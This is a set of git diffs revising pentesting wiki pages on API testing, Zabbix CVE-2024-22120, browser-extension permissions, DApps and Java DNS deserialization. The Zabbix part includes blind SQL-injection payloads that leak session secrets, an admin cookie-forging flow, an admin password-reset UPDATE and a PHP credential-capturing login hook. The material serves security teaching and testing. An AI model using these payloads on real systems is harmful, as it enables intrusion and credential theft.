 - **Parameter Tampering**: Experiment with adding or replacing parameters in requests to access unauthorized data or functionalities.
 - **HTTP Method Testing**: Vary request methods (GET, POST, PUT, DELETE, PATCH) to uncover unexpected behaviors or information disclosures.
@@ -122,7 +122,7 @@ Impact to assess
 
 ### **Tools and Resources for API Pentesting**
 
-- [**kiterunner**](https://github.com/assetnote/kiterunner): Excellent for discovering API endpoints. Use it to scan and brute force paths and parameters against target APIs.
+- **Kiterunner** discovers API routes and parameters using compiled route wordlists:<sup>[[8]](#references)</sup>
 
 ```bash
 kr scan https://domain.com/api/ -w routes-large.kite -x 20
@@ -131,9 +131,9 @@ kr brute https://domain.com/api/ -A=raft-large-words -x 20 -d=0
 kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
 ```
 
-- [**https://github.com/BishopFox/sj**](https://github.com/BishopFox/sj): sj is a command line tool designed to assist with auditing of **exposed Swagger/OpenAPI definition files** by checking the associated API endpoints for weak authentication. It also provides command templates for manual vulnerability testing.
+- **sj** audits exposed Swagger/OpenAPI definitions for weak authentication and generates command templates for manual testing.<sup>[[9]](#references)</sup>
 - Additional tools like **automatic-api-attack-tool**, **Astra**, and **restler-fuzzer** offer tailored functionalities for API security testing, ranging from attack simulation to fuzzing and vulnerability scanning.
-- [**Cherrybomb**](https://github.com/blst-security/cherrybomb): It's an API security tool that audit your API based on an OAS file(the tool written in rust).
+- **Cherrybomb** performs API-security checks from an OpenAPI Specification document.<sup>[[10]](#references)</sup>
 
 ### **Learning and Practice Resources**
 
@@ -149,5 +149,11 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
 - [3] [Apache CXF advisory for CVE-2022-46364](https://cxf.apache.org/security-advisories.data/CVE-2022-46364.txt)
 - [4] [Apache CXF security advisories](https://cxf.apache.org/security-advisories.html)
 - [5] [0xdf - HTB DevArea](https://0xdf.gitlab.io/2026/07/04/htb-devarea.html)
+- [6] [OpenAPI Specification](https://spec.openapis.org/oas/latest.html)
+- [7] [MDN - Cross-Origin Resource Sharing (CORS)](https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CORS)
+- [8] [Assetnote - Kiterunner](https://github.com/assetnote/kiterunner)
+- [9] [BishopFox - sj](https://github.com/BishopFox/sj)
+- [10] [BLST Security - Cherrybomb](https://github.com/blst-security/cherrybomb)
+- [11] [Swagger UI](https://swagger.io/tools/swagger-ui/)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
+++ b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
@@ -132,6 +132,7 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
 ```
 
 - **sj** audits exposed Swagger/OpenAPI definitions for weak authentication and generates command templates for manual testing.<sup>[[9]](#references)</sup>
+- **Postman** can import OpenAPI definitions from a file, URL, raw JSON/YAML, or a repository and generate a request collection, which is useful for preserving and replaying a discovered API surface.<sup>[[12]](#references)</sup>
 - Additional tools like **automatic-api-attack-tool**, **Astra**, and **restler-fuzzer** offer tailored functionalities for API security testing, ranging from attack simulation to fuzzing and vulnerability scanning.
 - **Cherrybomb** performs API-security checks from an OpenAPI Specification document.<sup>[[10]](#references)</sup>
 
@@ -155,5 +156,6 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
 - [9] [BishopFox - sj](https://github.com/BishopFox/sj)
 - [10] [BLST Security - Cherrybomb](https://github.com/blst-security/cherrybomb)
 - [11] [Swagger UI](https://swagger.io/tools/swagger-ui/)
+- [12] [Postman Docs – Integrate Postman with OpenAPI](https://learning.postman.com/docs/integrations/available-integrations/working-with-openAPI/)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/zabbix.md
+++ b/src/network-services-pentesting/pentesting-web/zabbix.md
@@ -4,40 +4,40 @@
 
 ## Overview
 
-Zabbix is a monitoring platform exposing a web UI (typically behind Apache/Nginx) and a server component that also talks the Zabbix protocol on TCP/10051 (server/trapper) and agent on TCP/10050. During engagements you may encounter:
+Zabbix is a monitoring platform with a web frontend (often behind Apache or Nginx), a server/trapper that commonly listens on TCP/10051, and agents that commonly listen on TCP/10050. During an authorized assessment, you may encounter:<sup>[[5]](#references)</sup>
 
 - Web UI: HTTP(S) virtual host like zabbix.example.tld
-- Zabbix server port: 10051/tcp (JSON over a ZBXD header framing)
+- Zabbix server port: 10051/tcp (messages commonly use JSON inside `ZBXD\x01` framing)
 - Zabbix agent port: 10050/tcp
 
-Useful cookie format: zbx_session is Base64 of a compact JSON object that includes at least sessionid, serverCheckResult, serverCheckTime and sign. The sign is an HMAC of the JSON payload.
+The `zbx_session` implementation used by the affected versions and public PoC is a Base64-encoded compact JSON object containing fields such as `sessionid`, `serverCheckResult`, `serverCheckTime`, and `sign`. Treat the precise fields, canonicalization, and signing algorithm as version-specific and confirm them against the deployed frontend code.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ## zbx_session cookie internals
 
-Recent Zabbix versions compute the cookie like:
+The vulnerable-version workflow documented by the public research computes the cookie as follows:
 
 - data JSON: {"sessionid":"<32-hex>","serverCheckResult":true,"serverCheckTime":<unix_ts>}
 - sign: HMAC-SHA256(key=session_key, data=JSON string of data sorted by keys and compact separators)
 - Final cookie: Base64(JSON_with_sign)
 
-If you can recover the global session_key and a valid admin sessionid, you can forge a valid Admin cookie offline and authenticate to the UI.<sup>[[1]](#references)</sup>
+If you recover the corresponding global `session_key` and a still-valid administrative `sessionid`, this format can be used to forge an administrative cookie offline. A different frontend version or invalidated session may require a different structure.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ## CVE-2024-22120 — Time-based blind SQLi in Zabbix Server audit log
 
 Affected versions (as publicly documented):
 
-- 6.0.0–6.0.27, 6.4.0–6.4.12, 7.0.0alpha1
+- 6.0.0–6.0.27, 6.4.0–6.4.12, and the 7.0 prereleases from 7.0.0alpha1 through 7.0.0beta1. The vendor issue records fixes in 6.0.28rc1, 6.4.13rc1, and 7.0.0beta2.<sup>[[3]](#references)[[4]](#references)</sup>
 
 Vulnerability summary:
 
-- When a Script execution is recorded into the Zabbix Server audit log, the clientip field is not sanitized and is concatenated into SQL, enabling time-based blind SQLi via the server component.<sup>[[1]](#references)</sup>
-- This is exploitable by sending a crafted "command" request to the Zabbix server port 10051 with a valid low-privileged sessionid, a hostid the user can access, and a permitted scriptid.
+- When a configured script execution is recorded in the Zabbix server audit log, the `clientip` value reaches an SQL statement without the necessary sanitization, enabling time-based blind SQL injection.<sup>[[3]](#references)[[4]](#references)</sup>
+- The vendor's reproduction uses a crafted `command` request to port 10051 with an authenticated session, a host that the user can access, and a script that the user is permitted to run. Zabbix's CVSS assessment classifies the prerequisite as high privileges, while NVD scores it as low privileges; test the actual role, host, and script permissions rather than assuming either classification applies to every installation.<sup>[[3]](#references)[[4]](#references)</sup>
 
 Preconditions and discovery tips:
 
-- sessionid: From guest/login in the web UI, decode zbx_session (Base64) to get sessionid.
-- hostid: Observe via web UI requests (e.g., Monitoring → Hosts) or intercept with a proxy; common default is 10084.
-- scriptid: Only scripts permitted to the current role will execute; verify by inspecting the script menu/AJAX responses. Defaults like 1 or 2 are often allowed; 3 may be denied.
+- `sessionid`: Decode the authenticated user's `zbx_session` cookie when its version uses the JSON format above. A guest identifier is usable only when guest access is enabled and the guest is actually issued a session with the required access.
+- `hostid`: Obtain an accessible host identifier from frontend requests such as **Monitoring → Hosts**. Values such as `10084` are lab-specific examples, not universal defaults.
+- `scriptid`: Verify the scripts exposed to the current user through the menu or frontend requests. Values such as `1`, `2`, and `3` are lab-specific; authorization depends on the script's user group, host group, host-access requirement, and scope.<sup>[[6]](#references)</sup>
 
 ### Exploitation flow
 
@@ -57,11 +57,11 @@ Minimal message (JSON body) fields:
 }
 ```
 
-The full wire format is: "ZBXD\x01" + 8-byte little-endian length + UTF-8 JSON. You can use pwntools or your own socket code to frame it.
+For these versions, the full wire format is `ZBXD\x01` followed by an 8-byte little-endian payload length and the UTF-8 JSON body. You can use pwntools or a socket client to construct it.<sup>[[5]](#references)</sup>
 
 2) Time-bruteforce secrets via conditional sleep
 
-Use conditional expressions to leak hex-encoded secrets 1 char at a time by measuring response time. Examples that have worked in practice:
+Use conditional expressions to leak hex-encoded secrets one character at a time by measuring response time. The following expressions target the MySQL-compatible schema used in the referenced lab and PoC; adjust functions and schema names for the target database and version:<sup>[[1]](#references)[[2]](#references)</sup>
 
 - Leak global session_key from config:
 
@@ -69,7 +69,7 @@ Use conditional expressions to leak hex-encoded secrets 1 char at a time by meas
 (select CASE WHEN (ascii(substr((select session_key from config),{pos},1))={ord}) THEN sleep({T_TRUE}) ELSE sleep({T_FALSE}) END)
 ```
 
-- Leak Admin session_id (userid=1) from sessions:
+- Leak a candidate administrative session ID from `sessions` (the `userid=1` assumption is lab-specific):
 
 ```sql
 (select CASE WHEN (ascii(substr((select sessionid from sessions where userid=1 limit 1),{pos},1))={ord}) THEN sleep({T_TRUE}) ELSE sleep({T_FALSE}) END)
@@ -78,15 +78,15 @@ Use conditional expressions to leak hex-encoded secrets 1 char at a time by meas
 Notes:
 
 - charset: 32 hex chars [0-9a-f]
-- Pick T_TRUE >> T_FALSE (e.g., 10 vs 1) and measure wall-clock per attempt
+- Pick `T_TRUE` much greater than `T_FALSE` (for example, 10 versus 1) and measure wall-clock time per attempt
 - Ensure your scriptid is actually authorized for the user; otherwise no audit row is produced and timing won’t work
 
 3) Forge Admin cookie
 
-Once you have:
+For the cookie format described above, once you have:
 
 - session_key: 32-hex from config.session_key
-- admin_sessionid: 32-hex from sessions.sessionid for userid=1
+- `admin_sessionid`: a current 32-hex session identifier for the intended administrative account
 
 Compute:
 
@@ -102,7 +102,7 @@ Set the cookie zbx_session to this value and GET /zabbix.php?action=dashboard.vi
 
 ## RCE via Script execution (post-Admin)
 
-With Admin access in the UI, you can execute predefined Scripts against monitored hosts. If agents/hosts execute script commands locally, this yields code execution on those systems (often as the zabbix user on Linux hosts):<sup>[[1]](#references)</sup>
+Administrative frontend access alone does not guarantee operating-system command execution. The user must be able to create or run an applicable global script, its **Execute on** target must run commands, and the corresponding component must permit them. Agent execution normally requires an appropriate `AllowKey=system.run[...]`; proxy execution requires its remote-command setting; and new Zabbix 7.0 installations set `EnableGlobalScripts=0` for server-side global scripts by default. When those prerequisites are present, script execution can yield code execution on monitored systems, often as the `zabbix` account on Linux.<sup>[[1]](#references)[[6]](#references)</sup>
 
 - Quick check: run id to confirm user context
 - Reverse shell example:
@@ -120,15 +120,17 @@ stty raw -echo; fg
 reset
 ```
 
-If you have DB access, an alternative to forging a cookie is resetting the Admin password to the documented bcrypt for "zabbix":
+In the referenced lab, direct database access also allowed the administrative password to be changed to the shown bcrypt value for `zabbix`:
 
 ```sql
 UPDATE users SET passwd='$2a$10$ZXIvHAEP2ZM.dLXTm6uPHOMVlARXX7cqjbhM6Fn0cANzkCQBWpMrS' WHERE username='Admin';
 ```
 
+This is a destructive, schema-specific post-compromise technique: back up the affected row, verify the username column and account, and expect MFA or external authentication to remain an additional barrier. Prefer creating a temporary, audited recovery account through supported administration procedures when possible.
+
 ## Credential capture via login hook (post-exploitation)
 
-If file write is possible on the web UI server, you can temporarily add a logging snippet to /usr/share/zabbix/index.php around the form-based login branch to capture credentials:<sup>[[1]](#references)</sup>
+If file write is already possible on the web server, the referenced lab temporarily added the following logging snippet to `/usr/share/zabbix/index.php` around the form-login branch. This is an intrusive post-compromise credential-capture technique: use it only with explicit authorization, protect the output, and restore the original file immediately after testing.<sup>[[1]](#references)</sup>
 
 ```php
 // login via form
@@ -140,11 +142,11 @@ if (hasRequest('enter') && CWebUser::login(getRequest('name', ZBX_GUEST_USER), g
 }
 ```
 
-Users authenticate normally; read /dev/shm/creds.txt afterwards. Remove the hook when done.
+Users authenticate normally; read `/dev/shm/creds.txt` afterward and remove the hook. File paths and login code differ across packages and versions.
 
 ## Pivoting to internal services
 
-Even if the service account shell is /usr/sbin/nologin, adding an SSH authorized_keys entry and using -N -L allows local port-forwarding to loopback-only services (e.g., CI/CD at 8111):<sup>[[1]](#references)</sup>
+Where SSH key authentication and TCP forwarding are accepted for the compromised account, `-N -L` may allow forwarding to loopback-only services (for example, CI/CD on port 8111) even when the account is not intended for interactive shells. An `/usr/sbin/nologin` shell, `AllowTcpForwarding`, `DisableForwarding`, `PermitOpen`, key restrictions, or PAM policy can prevent this path, so verify the SSH policy rather than assuming it works:<sup>[[1]](#references)</sup>
 
 ```bash
 ssh -i key user@host -N -L 8111:127.0.0.1:8111
@@ -154,13 +156,17 @@ See more tunneling patterns in: Check [Tunneling and Port Forwarding](../../gene
 
 ## Operational tips
 
-- Validate scriptid is permitted for the current role (guest may have a limited set)
-- Timing brute can be slow; cache recovered admin sessionid and reuse it
+- Validate that `scriptid` is permitted for the current role; guest access does not imply permission to run a script
+- A timing attack can be slow; cache a recovered administrative session only while it remains valid
 - The JSON sent to 10051 must be framed with the ZBXD\x01 header and a little-endian length
 
 ## References
 
 - [1] [HTB Watcher — Zabbix CVE-2024-22120 to Admin/RCE and TeamCity root pivot](https://0xdf.gitlab.io/2025/10/09/htb-watcher.html)
 - [2] [CVE-2024-22120-RCE toolkit (PoC scripts)](https://github.com/W01fh4cker/CVE-2024-22120-RCE)
+- [3] [Zabbix ZBX-24505 — Time Based SQL Injection in Zabbix Server Audit Log](https://support.zabbix.com/browse/ZBX-24505)
+- [4] [NVD — CVE-2024-22120](https://nvd.nist.gov/vuln/detail/CVE-2024-22120)
+- [5] [Zabbix protocol header documentation](https://www.zabbix.com/documentation/current/en/manual/appendix/protocols/header_datalen)
+- [6] [Zabbix documentation — Global scripts](https://www.zabbix.com/documentation/current/en/manual/web_interface/frontend_sections/alerts/scripts)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
@@ -6,11 +6,11 @@
 
 ### **`permissions`**
 
-Permissions are defined in the extension's **`manifest.json`** file using the **`permissions`** property and allow access to almost anything a browser can access (Cookies or Physical Storage):<sup>[[2]](#references)</sup>
+Named API permissions are declared in an extension's **`manifest.json`** under **`permissions`**. Each permission grants a specific capability; origin access is controlled separately through host permissions.<sup>[[2]](#references)[[9]](#references)</sup>
 
-The previous manifest declares that the extension requires the `storage` permission. This means that it can use [the storage API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/storage) to store its data persistently. Unlike cookies or `localStorage` APIs which give users some level of control, **extension storage can normally only be cleared by uninstalling the extension**.
+An extension declaring `storage` can use the extension storage API to persist data. This storage is isolated from web-page `localStorage`; the extension can clear it programmatically, and removing the extension clears its data.<sup>[[12]](#references)</sup>
 
-An extension will request the permissions indicated in its **`manifest.json`** file and After installing the extension, you can **always check its permissions in your browser**, as shown in this image:
+An extension requests the permissions indicated in its **`manifest.json`**. After installation, you can review its permissions in the browser's extension-management interface.
 
 <figure><img src="../../images/image (18).png" alt=""><figcaption></figcaption></figure>
 
@@ -18,7 +18,7 @@ You can find the [**complete list of permissions a Chromium Browser Extension ca
 
 ### `host_permissions`
 
-The optional but powerful setting **`host_permissions`** indicates with which hosts the extension is going to be able to interact via apis such as [`cookies`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/cookies), [`webRequest`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/webRequest), and [`tabs`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs).
+The powerful **`host_permissions`** setting identifies the origins with which the extension can interact through APIs such as `cookies`, `webRequest`, and `tabs`.<sup>[[9]](#references)</sup>
 
 The following `host_permissions` basically allow every web:
 
@@ -45,7 +45,7 @@ These are the hosts that the browser extension can access freely. This is becaus
 
 ### Cookies
 
-The **`cookies`** permission allows the extension to access **all the cookies** of the browser. In [**this blog post**](https://theindiannetwork.medium.com/reverse-engineering-a-browser-extension-led-me-to-a-dangerous-exploit-25-000-bounty-c7dda4601753) this permissions was abused through a **vulnerable backdound script** to abuse a browser extension to give the attacker all cookies of the browser of the victim user that accessed the malicious web page.<sup>[[8]](#references)</sup> The vulnerable code was just sending back all the cookies:
+The **`cookies`** permission, together with matching host permissions, allows an extension to access cookies for those hosts, including cookies marked `HttpOnly`.<sup>[[10]](#references)</sup> A disclosed extension vulnerability exposed this capability through an insecure background-script message handler, allowing a malicious page to request the victim's cookies.<sup>[[8]](#references)</sup> The vulnerable code returned every cookie visible to the extension:
 
 ```javascript
 chrome.runtime.onMessage.addListener(
@@ -62,16 +62,16 @@ chrome.runtime.onMessage.addListener(
 
 ### Tabs
 
-Moreover, **`host_permissions`** also unlock “advanced” [**tabs API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs) **functionality.** They allow the extension to call [tabs.query()](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/query) and not only get a **list of user’s browser tabs** back but also learn which **web page (meaning address and title) is loaded**.<sup>[[1]](#references)</sup>
+Moreover, the `tabs` permission or a matching host permission exposes sensitive `tabs.Tab` properties such as a tab's URL, title, and favicon. `tabs.query()` itself is available without those permissions, but sensitive properties are omitted when the extension lacks the required access.<sup>[[1]](#references)[[9]](#references)[[13]](#references)</sup>
 
 > [!CAUTION]
 > Not only that, listeners like [**tabs.onUpdated**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/onUpdated) **become way more useful as well**. These will be notified whenever a new page loads into a tab.
 
 ### Running content scripts <a href="#running-content-scripts" id="running-content-scripts"></a>
 
-Content scripts aren’t necessarily written statically into the extension manifest. Given sufficient **`host_permissions`**, **extensions can also load them dynamically by calling** [**tabs.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/executeScript) **or** [**scripting.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/scripting/executeScript).<sup>[[1]](#references)</sup>
+Content scripts need not be declared statically in the manifest. With host access (or a temporary `activeTab` grant), MV2 extensions can use `tabs.executeScript()` and MV3 extensions can use `scripting.executeScript()`; the MV3 API also requires the `scripting` permission.<sup>[[1]](#references)[[11]](#references)</sup>
 
-Both APIs allow executing not merely files contained in the extensions as content scripts but also **arbitrary cod**e. The former allows passing in JavaScript code as a string while the latter expects a JavaScript function which is less prone to injection vulnerabilities. Still, both APIs will wreak havoc if misused.
+Both APIs can inject extension files, while MV2's API also accepts a code string and MV3's API accepts a JavaScript function. Any path that lets untrusted input influence the selected file, function, arguments, or MV2 code string is therefore security-sensitive.
 
 > [!CAUTION]
 > In addition to the capabilities above, content scripts could for example **intercept credentials** as these are entered into web pages. Another classic way to abuse them is **injecting advertising** on each an every website. Adding **scam messages** to abuse credibility of news websites is also possible. Finally, they could **manipulate banking** websites to reroute money transfers.
@@ -153,7 +153,7 @@ Practical checks:
 
 Manifest V3 split page access from API permissions: **`permissions`** still governs privileged APIs (cookies, tabs, history, scripting, etc.) while **`host_permissions`** controls which origins those APIs can touch. MV3 also made host permissions **runtime‑grantable**, so extensions can ship with none and pop a consent prompt later via `chrome.permissions.request()`—handy for legit least‑privilege flows, but also abused by malware to escalate after reputation is established.<sup>[[4]](#references)</sup>
 
-A stealthy variant is **`declarativeNetRequestWithHostAccess`** (Chrome ≥96). It provides the same request‑blocking/redirect power as `declarativeNetRequest` but **shows a weaker install prompt** than `<all_urls>` host permissions. Malicious extensions use it to silently get “block/redirect on any site” capability; test prompts with `chrome://extensions/?errors` and `chrome://extensions/?id=<id>`.<sup>[[7]](#references)</sup>
+The **`declarativeNetRequestWithHostAccess`** permission (Chrome 96+) exposes declarative request rules but does **not** grant origins by itself: rules can affect a host only when the extension separately has host access for the request and, for redirects, the target.<sup>[[7]](#references)</sup> During testing, inspect both the named permission and the effective host grants in `chrome://extensions/?id=<id>`.
 
 `declarativeNetRequest` dynamic rules let an extension reprogram network policy at runtime. With `<all_urls>` host access an attacker can weaponise it to hijack traffic or data exfil. Example:
 
@@ -171,7 +171,7 @@ chrome.declarativeNetRequest.updateDynamicRules({
 });
 ```
 
-Chrome raised MV3 rule limits (≈330k static / 30k dynamic), so large coverage sets are feasible for interception/ads injection.
+Chrome supports large static rulesets and separate quotas for dynamic and session rules; query the live rules and consult the current API limits instead of assuming the packaged rules are the complete policy.<sup>[[7]](#references)</sup>
 
 
 ### Recent abuse patterns
@@ -199,8 +199,11 @@ However, tightening security measures often results in decreased flexibility and
 - [6] [chrome_settings_overrides | Chrome Extensions manifest](https://developer.chrome.com/docs/extensions/reference/manifest/chrome-settings-override)
 - [7] [declarativeNetRequest API | Chrome Extensions](https://developer.chrome.com/docs/extensions/reference/api/declarativeNetRequest)
 - [8] [Reverse engineering a browser extension led me to a dangerous exploit ($25,000 bounty)](https://theindiannetwork.medium.com/reverse-engineering-a-browser-extension-led-me-to-a-dangerous-exploit-25-000-bounty-c7dda4601753)
+- [9] [Chrome for Developers - Declare permissions](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions)
+- [10] [Chrome for Developers - chrome.cookies API](https://developer.chrome.com/docs/extensions/reference/api/cookies)
+- [11] [Chrome for Developers - chrome.scripting API](https://developer.chrome.com/docs/extensions/reference/api/scripting)
+- [12] [Chrome for Developers - chrome.storage API](https://developer.chrome.com/docs/extensions/reference/api/storage)
+- [13] [Chrome for Developers - chrome.tabs API](https://developer.chrome.com/docs/extensions/reference/api/tabs)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
@@ -153,7 +153,7 @@ Practical checks:
 
 Manifest V3 split page access from API permissions: **`permissions`** still governs privileged APIs (cookies, tabs, history, scripting, etc.) while **`host_permissions`** controls which origins those APIs can touch. MV3 also made host permissions **runtime‑grantable**, so extensions can ship with none and pop a consent prompt later via `chrome.permissions.request()`—handy for legit least‑privilege flows, but also abused by malware to escalate after reputation is established.<sup>[[4]](#references)</sup>
 
-The **`declarativeNetRequestWithHostAccess`** permission (Chrome 96+) exposes declarative request rules but does **not** grant origins by itself: rules can affect a host only when the extension separately has host access for the request and, for redirects, the target.<sup>[[7]](#references)</sup> During testing, inspect both the named permission and the effective host grants in `chrome://extensions/?id=<id>`.
+The **`declarativeNetRequestWithHostAccess`** permission (Chrome 96+) exposes declarative request rules but does **not** grant origins by itself: rules can affect a host only when the extension separately has host access for the request and, for redirects, the target. Unlike `declarativeNetRequest`, this permission does not produce its own install-time warning, so the quieter permission name must be assessed together with the extension's separately granted host access.<sup>[[7]](#references)</sup> During testing, inspect both the named permission and the effective host grants in `chrome://extensions/?id=<id>`.
 
 `declarativeNetRequest` dynamic rules let an extension reprogram network policy at runtime. With `<all_urls>` host access an attacker can weaponise it to hijack traffic or data exfil. Example:
 
@@ -206,4 +206,3 @@ However, tightening security measures often results in decreased flexibility and
 - [13] [Chrome for Developers - chrome.tabs API](https://developer.chrome.com/docs/extensions/reference/api/tabs)
 
 {{#include ../../banners/hacktricks-training.md}}
-

--- a/src/pentesting-web/dapps-DecentralizedApplications.md
+++ b/src/pentesting-web/dapps-DecentralizedApplications.md
@@ -4,7 +4,7 @@
 
 ## What is a DApp?
 
-A DApp is a decentralized application that runs on a peer-to-peer network, rather than being hosted on a centralized server. DApps are typically built on **blockchain technology**, which should allow for transparency, security, and immutability of data.
+A decentralized application (DApp) places some application state or execution in smart contracts or another peer-to-peer protocol. Many production DApps are hybrid systems with a normal web frontend, RPC provider, indexer, and centralized API around the on-chain component; “decentralized” therefore describes an architectural property, not a guarantee of security or the absence of servers.<sup>[[1]](#references)</sup>
 
 ## Web3 DApp Architecture
 
@@ -41,7 +41,7 @@ Of course, if the DApp is not using a backend or the backend used only offers pu
 
 ## Web3 attack surface
 
-Even if in general a DApp has a reduced attack surface as several security checks are always done on the blockchain, there are still some attack vectors that can be exploited by an attacker.
+Moving checks on-chain changes the trust boundaries but does not inherently reduce the attack surface. The smart contracts, frontend, wallet/provider bridge, RPC and indexing infrastructure, relayers, and centralized APIs must all be assessed.
 
 It might be possible to group web3 DApps vulnerabilities in the following categories:
 
@@ -81,7 +81,7 @@ In many DApps, the most dangerous action is no longer an on-chain `approve`, but
 - **`permit` / signature approvals**: ERC-2612 allows changing `allowance` with a signed message. That means a phishing page or a compromised frontend can ask the victim to sign an approval that is later submitted by any relayer.<sup>[[4]](#references)</sup>
 - **Relayer optionality**: the ERC-2612 spec explicitly notes that a relayer gets a free option to submit or withhold a signed permit until `deadline`, so backend workflows that assume "signature received == action already happened" are wrong.<sup>[[4]](#references)</sup>
 - **Typed-data UX gaps**: wallets may render the domain and field names but still fail to explain the actual effect of the signature, especially when nested calldata, routers, or multicalls are involved.
-- **Permit-drainer pattern**: instead of asking for a visible `approve`, drainers increasingly prefer typed-data signatures that authorize a spender or relay path, because they are faster, cheaper, and less suspicious to the victim.
+- **Permit-drainer pattern**: instead of asking for a visible `approve`, drainers may request typed-data signatures that authorize a spender or relay path. ERC-2612 and Permit2 use different message formats and nonce models, so identify the exact verifier before testing replay, deadline, and spender binding.<sup>[[4]](#references)[[5]](#references)</sup>
 
 From a tester perspective, search the frontend and backend for `permit`, `permit2`, `eth_signTypedData`, `personal_sign`, `isValidSignature`, and any API that stores signatures for later broadcast. Confirm that nonces, deadlines, chain/domain separation, spender binding, and intended execution path are actually validated server-side or on-chain.
 
@@ -94,7 +94,7 @@ DApps usually do not read raw chain state directly for every action. They rely o
 - **Indexer poisoning**: custom indexers that trust every emitted event or decode logs without validating the emitting contract/address can import attacker-controlled data into databases, leaderboards, bridge pipelines, or reward systems.
 - **Unsafe replay of backend actions**: webhook-driven bots, settlement workers, or queue consumers often assume event processing is idempotent. If the same event can be replayed after retries or reorg rewinds, value-moving actions may execute more than once.
 
-When attacking this layer, review how the DApp handles confirmations, reorg rollbacks, duplicate deliveries, and contract-address allowlists in event consumers. Recent production guidance for blockchain indexers stresses that forward-filling indexers must be reorg-aware and able to rewind to the common ancestor instead of treating the current tip as immutable.
+When attacking this layer, review how the DApp handles confirmations, reorg rollbacks, duplicate deliveries, and contract-address allowlists in event consumers. A block seen at the chain tip is not necessarily finalized, so indexers and value-moving backends must distinguish inclusion from finality and be able to reconcile a reorganization.<sup>[[6]](#references)</sup>
 
 Some examples from [**this post**](https://www.certik.com/resources/blog/web2-meets-web3-hacking-decentralized-applications):<sup>[[1]](#references)</sup>
 
@@ -141,5 +141,7 @@ Keep this page generic, but note that account-abstraction-specific bugs are cove
 - [2] [EIP-6963 – Multi Injected Provider Discovery](https://eips.ethereum.org/EIPS/eip-6963)
 - [3] [WalletConnect – Protect Users from Phishing with the WalletConnect Verify API](https://walletconnect.com/blog/protect-users-from-phishing-with-walletconnect-verify-api-for-web3-apps-and-wallets)
 - [4] [EIP-2612 – permit: 712-signed approvals](https://eips.ethereum.org/EIPS/eip-2612)
+- [5] [Uniswap Permit2 - signature-based token approvals and transfers](https://github.com/Uniswap/permit2)
+- [6] [ethereum.org - Proof-of-stake finality](https://ethereum.org/developers/docs/consensus-mechanisms/pos/#finality)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
+++ b/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
@@ -4,16 +4,15 @@
 
 ## DNS request on deserialization
 
-The class `java.net.URL` implements `Serializable`, this means that this class can be serialized.
+The `java.net.URL` class implements `Serializable`, so instances can be included in a Java serialization stream.
 
 ```java
 public final class URL implements java.io.Serializable {
 ```
 
-This class have a **curious behaviour.** From the documentation: “**Two hosts are considered equivalent if both host names can be resolved into the same IP addresses**”.\
-Then, every-time an URL object calls **any** of the **functions `equals`** or **`hashCode`** a **DNS request** to get the IP Address is going to be **sent**.
+`URL` has a useful side effect for detection: host comparison may require name resolution, and both `equals()` and `hashCode()` are documented as potentially blocking operations. A lookup is not guaranteed on every invocation because the URL object and the resolver can cache results, but a deliberately prepared object can make deserialization perform a DNS lookup.<sup>[[1]](#references)[[5]](#references)</sup>
 
-**Calling** the function **`hashCode`** **from** an **URL** object is fairly easy, it's enough to insert this object inside a `HashMap` that is going to be deserialized. This is because **at the end** of the **`readObject`** function from `HashMap` this code is executed:
+One way to reach `URL.hashCode()` is to use the URL as a `HashMap` key. While reconstructing a serialized map, `HashMap.readObject()` hashes each key:
 
 ```java
 private void readObject(java.io.ObjectInputStream s)
@@ -25,7 +24,7 @@ private void readObject(java.io.ObjectInputStream s)
     }
 ```
 
-It is **going** the **execute** `putVal` with every value inside the `HashMap`. But, more relevant is the call to `hash` with every value. This is the code of the `hash` function:
+The relevant call is `hash(key)`, whose implementation invokes the key's `hashCode()` method:
 
 ```java
 static final int hash(Object key) {
@@ -34,9 +33,9 @@ static final int hash(Object key) {
 }
 ```
 
-As you can observe, **when deserializing** a **`HashMap`** the function `hash` is going to **be executed with every object** and **during** the **`hash`** execution **it's going to be executed `.hashCode()` of the object**. Therefore, if you **deserializes** a **`HashMap`** **containing** a **URL** object, the **URL object** will **execute** `.hashCode()`.
+Consequently, deserializing a `HashMap` containing a URL key can execute `URL.hashCode()`.
 
-Now, lets take a look to the code of `URLObject.hashCode()` :
+The relevant part of `URL.hashCode()` is:
 
 ```java
  public synchronized int hashCode() {
@@ -47,7 +46,7 @@ Now, lets take a look to the code of `URLObject.hashCode()` :
         return hashCode;
 ```
 
